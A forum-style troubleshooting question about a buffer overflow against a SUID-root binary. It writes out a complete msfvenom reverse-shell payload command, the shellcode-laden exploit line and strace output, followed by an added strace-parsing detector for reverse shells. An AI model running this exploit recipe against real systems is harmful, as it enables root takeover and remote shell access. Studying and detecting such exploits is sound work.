Saturday 7 August 2021

shell_reverse_tcp payload results in segmentation fault?

I'm trying to get a shell by exploiting a buffer overflow in a program using the metasploit linux/x86/shell_reverse_tcp exploit. I got the buffer size and offset needed using pattern_create.rb and pattern_offset.rb, which say the buffer size is 2060. The payload is encoded using msfvenom:

msfvenom -p linux/x86/shell_reverse_tcp lhost=127.0.0.1 lport=5555 --arch x86 --platform linux -b '\x00\x0a\x09' -f c --out shellcode.txt

The program is run as shown below and the result is a segmentation fault, with the other side running netcat. shell_reverse_tcp is the second concatenation, after the NOP sled (\x90), in the python print statement. The third concatenation is the return address that will overwrite EIP.

./leave_msg $(python -c "print('\x90' * 1965 + '\xba\x0c\x05\x16\x9f\xd9\xcd\xd9\x74\x24\xf4\x58\x31\xc9\xb1\x12\x83\xc0\x04\x31\x50\x0e\x03\x5c\x0b\xf4\x6a\x6d\xc8\x0f\x77\xde\xad\xbc\x12\xe2\xb8\xa2\x53\x84\x77\xa4\x07\x11\x38\x9a\xea\x21\x71\x9c\x0d\x49\xfd\x5e\xee\x88\x69\x5d\xee\x9f\xda\xe8\x0f\x2f\x7a\xbb\x9e\x1c\x30\x38\xa8\x43\xfb\xbf\xf8\xeb\x6a\xef\x8f\x83\x1a\xc0\x40\x31\xb2\x97\x7c\xe7\x17\x21\x63\xb7\x93\xfc\xe4' + '\xb3\xc5\xff\xff')")

Netcat is run as nc -vnltp 5555 and its output is the following:

Listening on [0.0.0.0] (family 0, port 5555)
Connection from 127.0.0.1 57212 received!

Running the program with strace shows that the connect call is successful but the SIGSEGV happens after it. These are the last system calls made:

socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3
dup2(3, 2)                              = 2
dup2(3, 1)                              = 1
dup2(3, 0)                              = 0
connect(3, {sa_family=AF_INET, sin_port=htons(5555), sin_addr=inet_addr("127.0.0.1")}, 102) = 0
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=NULL} ---
+++ killed by SIGSEGV (core dumped) +++
Segmentation fault (core dumped)

randomize_va_space is set to 0. The problem seems to be with the payload, but I don't know why; it's supposed to be one of the best payloads in metasploit. The msfvenom output is:

Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 (iteration=0)
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
Final size of c file: 425 bytes
Saved as: shellcode.txt

Some other info:

  1. leave_msg is a 32-bit ELF file present on a remote testing machine which I connect to using SSH; netcat was also run on this remote machine. Also note that the segmentation fault happens with or without strace.
  2. The SUID bit of leave_msg is set and the ELF file is owned by root.
  3. The shellcode was generated on my local machine on 64-bit Ubuntu.
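The strace excerpt above (socket, then dup2 onto fds 0/1/2, then an outbound connect) is the characteristic system-call fingerprint of a reverse shell, and it is useful when reviewing traces of a SUID binary. As an added example (not code from the post), here is a small parser that flags that pattern in strace output; the sample trace is constructed from the lines quoted above, and the regexes assume strace's default output format.

```python
import re

# Constructed sample, modelled on the strace excerpt quoted in the post.
SAMPLE_TRACE = """\
socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3
dup2(3, 2)                              = 2
dup2(3, 1)                              = 1
dup2(3, 0)                              = 0
connect(3, {sa_family=AF_INET, sin_port=htons(5555), sin_addr=inet_addr("127.0.0.1")}, 102) = 0
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=NULL} ---
"""

# Default strace formatting is assumed for these three call types.
SOCKET_RE = re.compile(r'^socket\(AF_INET6?, SOCK_STREAM.*\) = (\d+)$')
DUP2_RE = re.compile(r'^dup2\((\d+), ([012])\)\s*= [012]$')
CONNECT_RE = re.compile(
    r'^connect\((\d+), \{sa_family=AF_INET6?, sin_port=htons\((\d+)\), '
    r'sin_addr=inet_addr\("([^"]+)"\)\}, \d+\) = 0$')


def find_reverse_shell_fds(trace):
    """Return one record per socket fd that had stdin, stdout and stderr
    duplicated onto it and that was connected to a remote peer (in either
    order, since the Metasploit payload does the dup2 calls before connect)."""
    sockets = {}  # fd -> {"dups": set of std fds redirected, "peer": (ip, port)}
    for line in trace.splitlines():
        line = line.strip()
        m = SOCKET_RE.match(line)
        if m:
            sockets[int(m.group(1))] = {"dups": set(), "peer": None}
            continue
        m = DUP2_RE.match(line)
        if m and int(m.group(1)) in sockets:
            sockets[int(m.group(1))]["dups"].add(int(m.group(2)))
            continue
        m = CONNECT_RE.match(line)
        if m and int(m.group(1)) in sockets:
            sockets[int(m.group(1))]["peer"] = (m.group(3), int(m.group(2)))
    hits = []
    for fd, info in sockets.items():
        if info["peer"] is not None and info["dups"] >= {0, 1, 2}:
            hits.append({"fd": fd, "peer": info["peer"], "dups": sorted(info["dups"])})
    return hits


if __name__ == "__main__":
    for hit in find_reverse_shell_fds(SAMPLE_TRACE):
        print("reverse shell pattern: fd %d, stdio redirected, peer %s:%d"
              % (hit["fd"], hit["peer"][0], hit["peer"][1]))
```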
